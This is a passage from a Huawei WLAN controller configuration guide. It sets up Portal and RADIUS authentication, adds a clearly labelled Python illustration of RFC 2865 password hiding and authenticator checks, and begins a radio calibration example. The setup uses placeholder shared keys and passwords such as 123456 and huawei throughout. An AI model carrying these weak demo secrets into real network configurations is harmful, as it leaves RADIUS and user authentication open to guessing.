AC carrier ID/AC ID              Other/1
AP region ID                     10
Service set                      • SSID: test
                                 • Data forwarding mode: tunnel forwarding
SwitchA VLAN                     VLAN 100
DHCP server                      • IP addresses that the AC assigns to APs: 192.168.10.2 to 192.168.10.254/24
                                 • IP addresses that the Router assigns to STAs: 10.10.10.2 to 10.10.10.254/24
Gateway for the AP               VLANIF 100: 192.168.10.1/24
Gateway for STAs                 VLANIF 101: 10.10.10.1/24
RADIUS server parameters         • Server IP address: 10.12.10.1
                                 • Authentication port number: 1812
                                 • Accounting port number: 1813
                                 • Shared key: 123456
                                 • AAA domain: huawei.com
User name and password of STAs   • User name: test@huawei.com
                                 • Password: 123456
Portal server parameters         • Server IP address: 10.13.10.1
                                 • Authentication port number: 50100
                                 • Shared key: huawei

Configuration Roadmap
1. Configure WLAN basic services so that STAs can access the WLAN. This example uses
default configurations.
2. Configure a RADIUS server template, apply it to an AAA domain, and use a RADIUS
server to authenticate STAs' identities and perform accounting.
3. Configure Portal authentication. Hypertext Transfer Protocol (HTTP) request packets
from a user are redirected to the web page of the Portal server. After the user enters
identity information, the STA sends the user identity information to the RADIUS server.

Procedure
Step 1 Set the NAC mode to unified mode on the AC (default setting). Configure SwitchA and the
AC so that the AP and AC can transmit CAPWAP packets.

# Add GE0/0/1 that connects SwitchA to the AP to management VLAN 100 and add GE0/0/2
that connects SwitchA to the AC to the same VLAN.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100
[SwitchA] interface gigabitethernet 0/0/1
[SwitchA-GigabitEthernet0/0/1] port link-type trunk
[SwitchA-GigabitEthernet0/0/1] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/1] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/1] quit
[SwitchA] interface gigabitethernet 0/0/2
[SwitchA-GigabitEthernet0/0/2] port link-type trunk
[SwitchA-GigabitEthernet0/0/2] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/2] quit

# Add GE1/0/1 that connects the AC to SwitchA to VLAN 100.


<HUAWEI> system-view
[HUAWEI] sysname AC
[AC] vlan batch 100 101
[AC] interface gigabitethernet 1/0/1
[AC-GigabitEthernet1/0/1] port link-type trunk
[AC-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[AC-GigabitEthernet1/0/1] quit

Step 2 Configure the AC to communicate with the upstream device.


# Configure VLANIF 101 (service VLAN), VLANIF 102, VLANIF 103, and VLANIF 104.
[AC] vlan batch 101 102 103 104
[AC] interface vlanif 101
[AC-Vlanif101] ip address 10.10.10.1 24
[AC-Vlanif101] quit
[AC] interface vlanif 102
[AC-Vlanif102] ip address 10.11.10.2 24
[AC-Vlanif102] quit
[AC] interface vlanif 103
[AC-Vlanif103] ip address 10.12.10.2 24
[AC-Vlanif103] quit
[AC] interface vlanif 104
[AC-Vlanif104] ip address 10.13.10.2 24
[AC-Vlanif104] quit

# Add GE1/0/2 that connects the AC to the Router to VLAN 102.


[AC] interface gigabitethernet 1/0/2
[AC-GigabitEthernet1/0/2] port link-type trunk
[AC-GigabitEthernet1/0/2] port trunk allow-pass vlan 102
[AC-GigabitEthernet1/0/2] quit

# Add GE1/0/3 that connects the AC to the RADIUS server to VLAN 103.
[AC] interface gigabitethernet 1/0/3
[AC-GigabitEthernet1/0/3] port link-type trunk
[AC-GigabitEthernet1/0/3] port trunk allow-pass vlan 103
[AC-GigabitEthernet1/0/3] quit

# Add GE1/0/4 that connects the AC to the Portal server to VLAN 104.
[AC] interface gigabitethernet 1/0/4
[AC-GigabitEthernet1/0/4] port link-type trunk
[AC-GigabitEthernet1/0/4] port trunk allow-pass vlan 104
[AC-GigabitEthernet1/0/4] quit

# On the AC, configure a static route.


[AC] ip route-static 0.0.0.0 0.0.0.0 10.11.10.1

Step 3 Configure the AC to assign an IP address to the AP and the Router to assign IP addresses to
STAs.
# Configure the AC to assign an IP address to the AP from an interface IP address pool.
[AC] dhcp enable
[AC] interface vlanif 100
[AC-Vlanif100] ip address 192.168.10.1 24
[AC-Vlanif100] dhcp select interface //Configure an interface-based address pool.
[AC-Vlanif100] quit

# Configure the AC as the DHCP relay agent and enable user entry detection on the AC.
[AC] interface vlanif 101
[AC-Vlanif101] dhcp select relay //Configure the DHCP relay function.
[AC-Vlanif101] dhcp relay server-ip 10.11.10.1 //Set the DHCP server address for DHCP relay to 10.11.10.1, which resides on Router.
[AC-Vlanif101] quit

# Configure the Router as a DHCP server to allocate IP addresses to STAs.


<Huawei> system-view
[Huawei] sysname Router
[Router] dhcp enable
[Router] ip pool sta //Configure the address pool to assign IP addresses to STAs.
[Router-ip-pool-sta] gateway-list 10.10.10.1
[Router-ip-pool-sta] network 10.10.10.0 mask 24
[Router-ip-pool-sta] quit
[Router] vlan batch 102
[Router] interface vlanif 102
[Router-Vlanif102] ip address 10.11.10.1 24
[Router-Vlanif102] dhcp select global //Configure a global address pool.
[Router-Vlanif102] quit
[Router] interface gigabitethernet 2/0/0
[Router-GigabitEthernet2/0/0] port link-type trunk
[Router-GigabitEthernet2/0/0] port trunk allow-pass vlan 102
[Router-GigabitEthernet2/0/0] quit
[Router] ip route-static 10.10.10.0 24 10.11.10.2 //Configure a route on the Router destined for the network segment 10.10.10.0/24.

Step 4 Configure RADIUS authentication and accounting.


# Configure a RADIUS server template, an AAA authentication scheme, an AAA accounting
scheme, and domain information.
[AC] radius-server template radius_huawei
[AC-radius-radius_huawei] radius-server authentication 10.12.10.1 1812
[AC-radius-radius_huawei] radius-server accounting 10.12.10.1 1813
[AC-radius-radius_huawei] radius-server shared-key cipher 123456 //The default key is huawei.
[AC-radius-radius_huawei] quit
[AC] aaa
[AC-aaa] authentication-scheme radius_huawei
[AC-aaa-authen-radius_huawei] authentication-mode radius
[AC-aaa-authen-radius_huawei] quit
[AC-aaa] accounting-scheme radius_huawei
[AC-aaa-accounting-radius_huawei] accounting-mode radius
[AC-aaa-accounting-radius_huawei] quit
[AC-aaa] domain huawei.com
[AC-aaa-domain-huawei.com] authentication-scheme radius_huawei
[AC-aaa-domain-huawei.com] accounting-scheme radius_huawei
[AC-aaa-domain-huawei.com] radius-server radius_huawei
[AC-aaa-domain-huawei.com] quit
[AC-aaa] quit

# Test whether a STA can be authenticated using RADIUS authentication.


[AC] test-aaa test@huawei.com 123456 radius-template radius_huawei
Info: Account test succeed.
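Each test-aaa check (the MAC-address login 001122334455/001122334455 in the previous example and test@huawei.com/123456 here) makes the AC send a RADIUS Access-Request to 10.12.10.1:1812, protected only by the shared key 123456. The following added Python example, not code from the Huawei documentation, builds that request with the User-Password hiding defined in RFC 2865, parses it the way the server does, and checks the Response Authenticator of the server's reply; it assumes the AC uses its VLANIF 103 address 10.12.10.2 as NAS-IP-Address and sends no vendor-specific attributes.

```python
import hashlib
import hmac
import os
import struct
from typing import Dict, Optional, Tuple

# RFC 2865 codes and attribute types used below.
ACCESS_REQUEST, ACCESS_ACCEPT = 1, 2
ATTR_USER_NAME, ATTR_USER_PASSWORD, ATTR_NAS_IP_ADDRESS = 1, 2, 4


def mac_to_username(mac: str) -> str:
    """0011-2233-4455 -> 001122334455: the MAC-authentication user name without the '-' delimiter."""
    digits = mac.replace("-", "").replace(":", "").lower()
    if len(digits) != 12 or any(c not in "0123456789abcdef" for c in digits):
        raise ValueError(f"not a MAC address: {mac!r}")
    return digits

def hide_password(password: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """RFC 2865 section 5.2: pad to 16-octet blocks and XOR each with MD5(secret + previous block);
    the first block is keyed by the Request Authenticator instead of a previous block."""
    if len(password) > 128:
        raise ValueError("User-Password is limited to 128 octets")
    padded = password + b"\x00" * (-len(password) % 16) or b"\x00" * 16
    out, prev = b"", authenticator
    for i in range(0, len(padded), 16):
        block = bytes(p ^ k for p, k in zip(padded[i:i + 16], hashlib.md5(secret + prev).digest()))
        out, prev = out + block, block
    return out

def unhide_password(hidden: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """Inverse of hide_password, as the RADIUS server does it; NUL padding is stripped."""
    if not hidden or len(hidden) % 16:
        raise ValueError("hidden User-Password must be a non-empty multiple of 16 octets")
    out, prev = b"", authenticator
    for i in range(0, len(hidden), 16):
        block = hidden[i:i + 16]
        out += bytes(c ^ k for c, k in zip(block, hashlib.md5(secret + prev).digest()))
        prev = block
    return out.rstrip(b"\x00")

def encode_attribute(attr_type: int, value: bytes) -> bytes:
    """Type-Length-Value attribute; Length counts its own two header octets."""
    if len(value) > 253:
        raise ValueError("attribute value too long")
    return struct.pack("!BB", attr_type, len(value) + 2) + value

def build_access_request(identifier: int, user_name: str, password: str, secret: bytes,
                         nas_ip: str, authenticator: Optional[bytes] = None) -> bytes:
    """Access-Request as the AC sends it to the RADIUS server for one login attempt."""
    authenticator = authenticator or os.urandom(16)  # fresh random value for every request
    attrs = (encode_attribute(ATTR_USER_NAME, user_name.encode())
             + encode_attribute(ATTR_USER_PASSWORD, hide_password(password.encode(), secret, authenticator))
             + encode_attribute(ATTR_NAS_IP_ADDRESS, bytes(int(o) for o in nas_ip.split("."))))
    return struct.pack("!BBH", ACCESS_REQUEST, identifier, 20 + len(attrs)) + authenticator + attrs

def parse_packet(data: bytes) -> Tuple[int, int, bytes, Dict[int, bytes]]:
    """Split a packet into (code, identifier, authenticator, {type: value}); the Length field and
    every attribute length are checked against the bytes actually received before being trusted."""
    if len(data) < 20:
        raise ValueError("packet shorter than the 20-octet header")
    code, identifier, length = struct.unpack("!BBH", data[:4])
    if length < 20 or length > len(data):
        raise ValueError("bad Length field")
    attrs, pos = {}, 20
    while pos < length:
        if pos + 2 > length:
            raise ValueError("truncated attribute header")
        attr_type, attr_len = data[pos], data[pos + 1]
        if attr_len < 2 or pos + attr_len > length:
            raise ValueError("bad attribute length")
        attrs[attr_type] = data[pos + 2:pos + attr_len]
        pos += attr_len
    return code, identifier, data[4:20], attrs

def build_response(code: int, identifier: int, attrs: bytes, request_authenticator: bytes,
                   secret: bytes) -> bytes:
    """Server side: reply whose Response Authenticator (RFC 2865 section 3) is
    MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    header = struct.pack("!BBH", code, identifier, 20 + len(attrs))
    return header + hashlib.md5(header + request_authenticator + attrs + secret).digest() + attrs

def response_is_authentic(response: bytes, request_authenticator: bytes, secret: bytes) -> bool:
    """AC side: trust a reply only if its authenticator was computed with the shared key."""
    code, identifier, auth, _ = parse_packet(response)
    length = struct.unpack("!H", response[2:4])[0]
    expected = build_response(code, identifier, response[20:length], request_authenticator, secret)[4:20]
    return hmac.compare_digest(auth, expected)

if __name__ == "__main__":
    secret = b"123456"                         # shared key from the data planning table
    user = mac_to_username("0011-2233-4455")   # STA MAC from the data planning table
    code, ident, auth, attrs = parse_packet(build_access_request(1, user, user, secret, "10.12.10.2"))
    print(code, attrs[ATTR_USER_NAME], unhide_password(attrs[ATTR_USER_PASSWORD], secret, auth))
```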

Step 5 Configure Portal authentication.


# Configure Portal server parameters. Set the port number to 50100 (default setting).
[AC] web-auth-server test
[AC-web-auth-server-test] server-ip 10.13.10.1
[AC-web-auth-server-test] port 50100
[AC-web-auth-server-test] shared-key cipher huawei
[AC-web-auth-server-test] url http://10.13.10.1
[AC-web-auth-server-test] quit

Step 6 Configure AC system parameters.


# Configure the country code.
[AC] wlan ac-global country-code cn
Warning: Modify the country code may delete configuration on those AP which use the global country code and reset them, continue?[Y/N]:y

# Configure the AC ID and carrier ID.


[AC] wlan ac-global ac id 1 carrier id other //The default AC ID is 0. Set the AC ID to 1.

# Configure the source interface.


[AC] wlan
[AC-wlan-view] wlan ac source interface vlanif 100

Step 7 Manage the AP on the AC.


# Check the AP type ID after obtaining the MAC address of the AP.
[AC-wlan-view] display ap-type all
All AP types information:
------------------------------------------------------------------------------
ID Type
------------------------------------------------------------------------------
17 AP6010SN-GN
19 AP6010DN-AGN
21 AP6310SN-GN
23 AP6510DN-AGN
25 AP6610DN-AGN
27 AP7110SN-GN
28 AP7110DN-AGN
29 AP5010SN-GN
30 AP5010DN-AGN
31 AP3010DN-AGN
33 AP6510DN-AGN-US
34 AP6610DN-AGN-US
35 AP5030DN
36 AP5130DN
37 AP7030DE
38 AP2010DN
39 AP8130DN
40 AP8030DN
42 AP9330DN
43 AP4030DN
44 AP4130DN
45 AP3030DN
46 AP2030DN
------------------------------------------------------------------------------
Total number: 23

# Set the AP authentication mode to MAC address authentication (default setting). Add the
AP offline based on the AP type ID. Assume that the AP type is AP6010DN-AGN, and the
MAC address of the AP is 60de-4476-e360.
[AC-wlan-view] ap id 0 type-id 19 mac 60de-4476-e360
[AC-wlan-ap-0] quit

# Configure an AP region and add the AP to the AP region.


[AC-wlan-view] ap-region id 10 //Create AP region 10.
[AC-wlan-ap-region-10] quit
[AC-wlan-view] ap id 0
[AC-wlan-ap-0] region-id 10 //Add AP to region 10.
[AC-wlan-ap-0] quit

# After powering on the AP, run the display ap all command on the AC to check the AP
running status. The command output shows that the AP status is normal.
[AC-wlan-view] display ap all
All AP information:
Normal[1],Fault[0],Commit-failed[0],Committing[0],Config[0],Download[0]
Config-failed[0],Standby[0],Type-not-match[0],Ver-mismatch[0]
------------------------------------------------------------------------------
AP AP AP Profile AP AP
/Region
ID Type MAC ID State Sysname
------------------------------------------------------------------------------
0 AP6010DN-AGN 60de-4476-e360 0/10 normal ap-0
------------------------------------------------------------------------------
Total number: 1,printed: 1

Step 8 Configure WLAN service parameters.


# Create a WMM profile named wmm.
[AC-wlan-view] wmm-profile name wmm id 1
[AC-wlan-wmm-prof-wmm] quit

# Create a radio profile named radio and bind the WMM profile wmm to the radio profile.
[AC-wlan-view] radio-profile name radio id 1
[AC-wlan-radio-prof-radio] wmm-profile name wmm
[AC-wlan-radio-prof-radio] quit
[AC-wlan-view] quit

# Create WLAN-ESS interface 1.


[AC] interface wlan-ess 1
[AC-Wlan-Ess1] port trunk allow-pass vlan 101
[AC-Wlan-Ess1] quit

# Create a security profile named security.


[AC] wlan
[AC-wlan-view] security-profile name security id 1
[AC-wlan-sec-prof-security] quit

# Create a traffic profile named traffic.


[AC-wlan-view] traffic-profile name traffic id 1
[AC-wlan-traffic-prof-traffic] quit

# Create a service set named test and bind the WLAN-ESS interface, security profile, and
traffic profile to the service set.
[AC-wlan-view] service-set name test id 1
[AC-wlan-service-set-test] ssid test //Set the SSID name to test.
[AC-wlan-service-set-test] wlan-ess 1
[AC-wlan-service-set-test] security-profile name security
[AC-wlan-service-set-test] traffic-profile name traffic
[AC-wlan-service-set-test] service-vlan 101 //Set the VLAN ID of the service set to 101. The default value is 1.
[AC-wlan-service-set-test] forward-mode tunnel //Set the forwarding mode to tunnel forwarding.
[AC-wlan-service-set-test] quit

Step 9 Configure Portal authentication on the WLAN-ESS interface.


[AC-wlan-view] quit
[AC] interface wlan-ess 1
[AC-Wlan-Ess1] domain name huawei.com force
[AC-Wlan-Ess1] permit-domain name huawei.com
[AC-Wlan-Ess1] authentication portal
[AC-Wlan-Ess1] web-auth-server test direct
[AC-Wlan-Ess1] quit
[AC] wlan

Step 10 Configure a VAP and deliver VAP parameters to the AP.


# Configure a VAP.
[AC-wlan-view] ap 0 radio 0
[AC-wlan-radio-0/0] radio-profile name radio //Bind the radio template to a radio.
[AC-wlan-radio-0/0] service-set name test //Bind the service set to the radio.
[AC-wlan-radio-0/0] quit

# Commit the configuration.


[AC-wlan-view] commit ap 0
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y

Step 11 Verify the configuration.


l The WLAN with SSID test is available for STAs connected to the AP.
l The wireless PC obtains an IP address after it associates with the WLAN.
l Open a browser on the STA to access the web page. The Portal authentication web page
is automatically displayed. Enter the user name and password. The STA is authenticated
and can access the WLAN.

----End

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 100
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk allow-pass vlan 100
#
return

l Configuration file of the Router


#
sysname Router
#
vlan batch 102
#
dhcp enable
#
ip pool sta
gateway-list 10.10.10.1
network 10.10.10.0 mask 255.255.255.0
#
interface Vlanif102
ip address 10.11.10.1 255.255.255.0
dhcp select global
#
interface GigabitEthernet2/0/0
port link-type trunk
port trunk allow-pass vlan 102
#
ip route-static 10.10.10.0 255.255.255.0 10.11.10.2
#
return

l Configuration file of the AC

#
sysname AC
#
vlan batch 100 to 104
#
wlan ac-global carrier id other ac id 1
#
dhcp enable
#
radius-server template radius_huawei
radius-server authentication 10.12.10.1 1812 weight 80
radius-server accounting 10.12.10.1 1813 weight 80
radius-server shared-key cipher %#%#Dh.LR>nZA,K_(/~3#i!@a;6}Vk\T_9`ocp<^c"q%%#%
#
web-auth-server test
server-ip 10.13.10.1
port 50100
shared-key cipher %#%#Q"r\<Ei]o@"%dKN@Y(i,:nj2IY$e>=mXxg8Cdb]0%#%#
url http://10.13.10.1
#
aaa
authentication-scheme radius_huawei
authentication-mode radius
accounting-scheme radius_huawei
accounting-mode radius
domain huawei.com
authentication-scheme radius_huawei
accounting-scheme radius_huawei
radius-server radius_huawei
#
interface Vlanif100
ip address 192.168.10.1 255.255.255.0
dhcp select interface
#
interface Vlanif101
ip address 10.10.10.1 255.255.255.0
dhcp select relay
dhcp relay server-ip 10.11.10.1
#
interface Vlanif102
ip address 10.11.10.2 255.255.255.0
#
interface Vlanif103
ip address 10.12.10.2 255.255.255.0
#
interface Vlanif104
ip address 10.13.10.2 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 102
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 103
#
interface GigabitEthernet1/0/4
port link-type trunk
port trunk allow-pass vlan 104
#
interface Wlan-Ess1
port trunk allow-pass vlan 101
permit-domain name huawei.com
domain name huawei.com force
web-auth-server test direct
authentication portal
#
wlan
wlan ac source interface vlanif100
ap-region id 10
ap id 0 type-id 19 mac 60de-4476-e360 sn AB35015384
region-id 10
wmm-profile name wmm id 1
traffic-profile name traffic id 1
security-profile name security id 1
service-set name test id 1
forward-mode tunnel
wlan-ess 1
ssid test
traffic-profile id 1
security-profile id 1
service-vlan 101
radio-profile name radio id 1
wmm-profile id 1
ap 0 radio 0
radio-profile id 1
service-set id 1 wlan 1
#
return

15.8 Configuring Radio Calibration


15.8.1 Example for Configuring Radio Calibration

Radio Calibration Overview


Radio calibration dynamically adjusts the channels and transmit power of the APs managed by
the same AC so that the APs work at optimal performance. On a WLAN, the operating status of
APs is affected by the radio environment: for example, if adjacent APs managed by the same
AC work on overlapping channels, or an AP transmits at high power, signal interference
occurs. In this case, you can configure radio calibration on the AC.
Typical application scenarios of radio calibration are as follows:
l During AP deployment, configure radio calibration to enable APs to automatically select
the optimal channels.
l When new APs are added to a network or the network environment changes, configure
radio calibration so that APs can adjust channels and power at scheduled time to work at
optimal performance.

Configuration Notes
l In this example, the security policy is WPA2-PSK-CCMP. To ensure network security,
choose an appropriate security policy according to your network configuration.
l In tunnel forwarding mode, the management VLAN and service VLAN cannot be the same.
If you set the forwarding mode to direct forwarding, you are advised not to configure
the management VLAN and service VLAN to be the same either.
l If direct forwarding is used, configure port isolation on the switch interfaces that
directly connect to APs. If port isolation is not configured, many broadcast packets are
transmitted in the VLANs, and WLAN users on different APs can communicate directly at
Layer 2.
l Configure the management VLAN and service VLAN:
– In tunnel forwarding mode, service packets are encapsulated in a CAPWAP tunnel,
and then forwarded to the AC. The AC then forwards the packets to the upper-layer
network or APs. Therefore, service packets and management packets can be
normally forwarded only when the network between the AC and APs is added to
the management VLAN and the network between the AC and upper-layer network
is added to the service VLAN.
– In direct forwarding mode, service packets are not encapsulated into a CAPWAP
tunnel, but are directly forwarded to the upper-layer network or APs. Therefore,
service packets and management packets can be normally forwarded only when the
network between the AC and APs is added to the management VLAN and the
network between APs and upper-layer network is added to the service VLAN.
l How to configure the source interface:
– In V200R005 and V200R006, run the wlan ac source interface { loopback
loopback-number | vlanif vlan-id } command in the WLAN view.
– In V200R007 and V200R008, run the capwap source interface { loopback
loopback-number | vlanif vlan-id } command in the system view.
l When configuring radio calibration, set the channel mode and power mode of each AP that
needs radio calibration to auto.
l The following example uses scheduled radio calibration. Configure the APs to perform
radio calibration in off-peak hours, for example, between 00:00 and 06:00.
l No ACK mechanism is provided for multicast packet transmission on air interfaces. In
addition, wireless links are unstable. To ensure stable transmission of multicast packets,
they are usually sent at low rates. If a large number of such multicast packets are sent
from the network side, the air interfaces may be congested. You are advised to configure
multicast packet suppression to reduce impact of a large number of low-rate multicast
packets on the wireless network. Exercise caution when configuring the rate limit;
otherwise, the multicast services may be affected.
– In direct forwarding mode, you are advised to configure multicast packet
suppression on switch interfaces connected to APs.
– In tunnel forwarding mode, you are advised to configure multicast packet
suppression in traffic profiles of the AC.
For details on how to configure traffic suppression, see "How Do I Configure Multicast
Packet Suppression to Reduce Impact of a Large Number of Low-Rate Multicast Packets
on the Wireless Network?" in Configuration Guide — WLAN AC > WLAN QoS
Configuration.
l The following table lists applicable products and versions.

Table 15-17 Applicable products and versions

Software Version | Product Model | AP Model and Version
V200R005C00 | S12700 | V200R005C00: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN
V200R006C00 | S12700 | V200R005C00: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN
V200R007C00 | S12700 | V200R005C10: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN, AP8030DN, AP8130DN; V200R005C20: AP7030DE, AP9330DN
V200R008C00 | S12700 | V200R005C10: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN, AP8030DN, AP8130DN; V200R005C20: AP7030DE, AP9330DN; V200R005C30: AP2030DN, AP4030DN, AP4130DN

Networking Requirements
As shown in Figure 15-7, a WLAN containing three APs (AP1, AP2, and AP3) is deployed
on the campus network. The three APs join AP region 10.
Users expect the three APs to automatically adjust their channels and power to reduce
interference and achieve optimal WLAN performance.

Figure 15-7 Networking for configuring radio calibration
(AP1, AP2, and AP3 connect to SwitchA interfaces GE0/0/1, GE0/0/2, and GE0/0/3 in VLAN 100;
SwitchA GE0/0/4 connects to AC GE1/0/1 in VLAN 100; AC GE1/0/4 connects to the Internet in
VLAN 101. STAs associate with each AP.)

Management VLAN: VLAN 100
Service VLAN: VLAN 101
AP region ID: 10

Data Planning

Table 15-18 Data required for completing the configuration

Item | Data | Description
IP address of the AC's source interface | 192.168.10.1/24 | None
WMM profile | Name: wmm | None
Radio profile | Name: radio | None
Security profile | Name: security; security and authentication policy: WPA2+PSK; authentication key: huawei123; encryption mode: CCMP | None
Traffic profile | Name: traffic | None
Service set | Name: test; SSID: test; WLAN virtual interface: WLAN-ESS 1; data forwarding mode: tunnel forwarding | None
DHCP server | The AC functions as the DHCP server to assign IP addresses to APs and STAs. | None
AP gateway and IP address range | VLANIF 100: 192.168.10.1/24; 192.168.10.2 to 192.168.10.254/24 | None
STA gateway and IP address range | VLANIF 101: 192.168.11.1/24; 192.168.11.2 to 192.168.11.254/24 | None
MAC addresses of APs | AP1: 60de-4476-e360; AP2: dcd2-fc04-b500; AP3: dcd2-fc96-e4c0 | None

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure basic WLAN services to ensure that users can access the Internet through
WLAN.
2. Configure scheduled radio calibration so that the APs dynamically adjust their channels
and power and work at optimal performance.

Procedure
Step 1 Set the NAC mode to unified mode on the AC (default setting). Configure SwitchA and the
AC so that the APs and AC can transmit CAPWAP packets.
# Configure SwitchA and add interfaces GE0/0/1, GE0/0/2, GE0/0/3, and GE0/0/4 to VLAN
100 (management VLAN).
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100
[SwitchA] interface gigabitethernet 0/0/1
[SwitchA-GigabitEthernet0/0/1] port link-type trunk
[SwitchA-GigabitEthernet0/0/1] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/1] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/1] quit
[SwitchA] interface gigabitethernet 0/0/2
[SwitchA-GigabitEthernet0/0/2] port link-type trunk

[SwitchA-GigabitEthernet0/0/2] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/2] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/2] quit
[SwitchA] interface gigabitethernet 0/0/3
[SwitchA-GigabitEthernet0/0/3] port link-type trunk
[SwitchA-GigabitEthernet0/0/3] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/3] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/3] quit
[SwitchA] interface gigabitethernet 0/0/4
[SwitchA-GigabitEthernet0/0/4] port link-type trunk
[SwitchA-GigabitEthernet0/0/4] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/4] quit

# Add GE1/0/1 that connects the AC to SwitchA to VLAN 100.


[HUAWEI] sysname AC
[AC] vlan batch 100
[AC] interface gigabitethernet 1/0/1
[AC-GigabitEthernet1/0/1] port link-type trunk
[AC-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[AC-GigabitEthernet1/0/1] quit

Step 2 Connect the AC to upstream devices.


# Add AC's uplink interface GE1/0/4 to VLAN 101.
[AC] vlan batch 101
[AC] interface gigabitethernet 1/0/4
[AC-GigabitEthernet1/0/4] port link-type trunk
[AC-GigabitEthernet1/0/4] port trunk allow-pass vlan 101
[AC-GigabitEthernet1/0/4] quit

Step 3 Configure the AC as a DHCP server to allocate IP addresses to STAs and APs.
# Configure the AC as the DHCP server to allocate IP addresses to the APs from the IP
address pool on VLANIF 100, and allocate IP addresses to STAs from the IP address pool on
VLANIF 101.
[AC] dhcp enable //Enable the DHCP function.
[AC] interface vlanif 100
[AC-Vlanif100] ip address 192.168.10.1 24
[AC-Vlanif100] dhcp select interface //Configure an interface-based address pool.
[AC-Vlanif100] quit
[AC] interface vlanif 101
[AC-Vlanif101] ip address 192.168.11.1 24
[AC-Vlanif101] dhcp select interface
[AC-Vlanif101] quit

Step 4 Configure AC system parameters.


# Configure the country code.
[AC] wlan ac-global country-code cn
Warning: Modify the country code may delete configuration on those AP which use the global country code and reset them, continue?[Y/N]:y

# Configure the AC ID and carrier ID.


[AC] wlan ac-global ac id 1 carrier id other //The default AC ID is 0. Set the AC ID to 1.

# Configure the source interface.


[AC] wlan
[AC-wlan-view] wlan ac source interface vlanif 100

Step 5 Manage APs on the AC.


# Check the MAC address of the AP and view the AP type ID.

[AC-wlan-view] display ap-type all
All AP types information:
------------------------------------------------------------------------------
ID Type
------------------------------------------------------------------------------
17 AP6010SN-GN
19 AP6010DN-AGN
21 AP6310SN-GN
23 AP6510DN-AGN
25 AP6610DN-AGN
27 AP7110SN-GN
28 AP7110DN-AGN
29 AP5010SN-GN
30 AP5010DN-AGN
31 AP3010DN-AGN
33 AP6510DN-AGN-US
34 AP6610DN-AGN-US
35 AP5030DN
36 AP5130DN
37 AP7030DE
38 AP2010DN
39 AP8130DN
40 AP8030DN
42 AP9330DN
43 AP4030DN
44 AP4130DN
45 AP3030DN
46 AP2030DN
------------------------------------------------------------------------------
Total number: 23

# Set the AP authentication mode to MAC address authentication (default setting). Add the
AP offline according to the AP type ID. Assume that the AP type is AP6010DN-AGN and the
MAC addresses of the APs are 60de-4476-e360, dcd2-fc04-b500, and dcd2-fc96-e4c0
respectively.
[AC-wlan-view] ap id 1 type-id 19 mac 60de-4476-e360
[AC-wlan-ap-1] quit
[AC-wlan-view] ap id 2 type-id 19 mac dcd2-fc04-b500
[AC-wlan-ap-2] quit
[AC-wlan-view] ap id 3 type-id 19 mac dcd2-fc96-e4c0
[AC-wlan-ap-3] quit

# Configure an AP region and add the APs to the AP region.


[AC-wlan-view] ap-region id 10 //Create AP region 10.
[AC-wlan-ap-region-10] quit
[AC-wlan-view] ap id 1
[AC-wlan-ap-1] region-id 10 //Add APs to region 10.
[AC-wlan-ap-1] quit
[AC-wlan-view] ap id 2
[AC-wlan-ap-2] region-id 10
[AC-wlan-ap-2] quit
[AC-wlan-view] ap id 3
[AC-wlan-ap-3] region-id 10
[AC-wlan-ap-3] quit

# After powering on the three APs, run the display ap all command on the AC to check the
AP running status. The command output shows that the AP status is normal.
[AC-wlan-view] display ap all
All AP information:
Normal[3],Fault[0],Commit-failed[0],Committing[0],Config[0],Download[0]
Config-failed[0],Standby[0],Type-not-match[0],Ver-mismatch[0]
------------------------------------------------------------------------------
AP    AP              AP               Profile   AP        AP
                                       /Region
ID    Type            MAC              ID        State     Sysname
------------------------------------------------------------------------------
1     AP6010DN-AGN    60de-4476-e360   0/10      normal    ap-1
2     AP6010DN-AGN    dcd2-fc04-b500   0/10      normal    ap-2
3     AP6010DN-AGN    dcd2-fc96-e4c0   0/10      normal    ap-3
------------------------------------------------------------------------------
Total number: 3,printed: 3
